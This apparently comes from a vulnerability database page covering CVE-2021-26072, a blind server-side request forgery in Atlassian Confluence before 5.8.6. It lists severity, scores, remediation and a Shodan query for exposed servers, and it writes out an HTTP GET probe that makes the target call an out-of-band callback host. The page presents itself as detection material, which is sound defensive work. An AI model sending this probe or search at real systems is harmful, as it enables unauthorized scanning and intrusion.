🔙 목록으로 돌아가기

CVE-2021-26072: Atlassian Confluence < 5.8.6 - Server-Side Request Forgery

TitleAtlassian Confluence < 5.8.6 - Server-Side Request Forgery
AuthorTechbrunchFR
SeverityMedium
ImpactAuthenticated attackers can manipulate internal network resources via SSRF, potentially accessing sensitive internal services or data.
RemediationUpgrade to Confluence Server version 5.8.6 or later.
CVSS Score4.3
EPSS Score0.1813
CVE IDCVE-2021-26072
CWE IDCWE-918
Shodan Queryhttp.component:"Atlassian Confluence"
Tags cve cve2021 confluence atlassian ssrf oast vuln vkev

🔍 Vulnerability Description

Confluence Server and Data Center before 5.8.6 contain a blind server-side request forgery caused by the WidgetConnector plugin, letting remote attackers manipulate internal network resources, exploit requires network access to the server.

🌐 HTTP Request

GET /rest/sharelinks/1.0/link?url=https://d5jnj79le0o3ng2mvp80zcumnmbx64749.oast.online/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26072.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26072.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A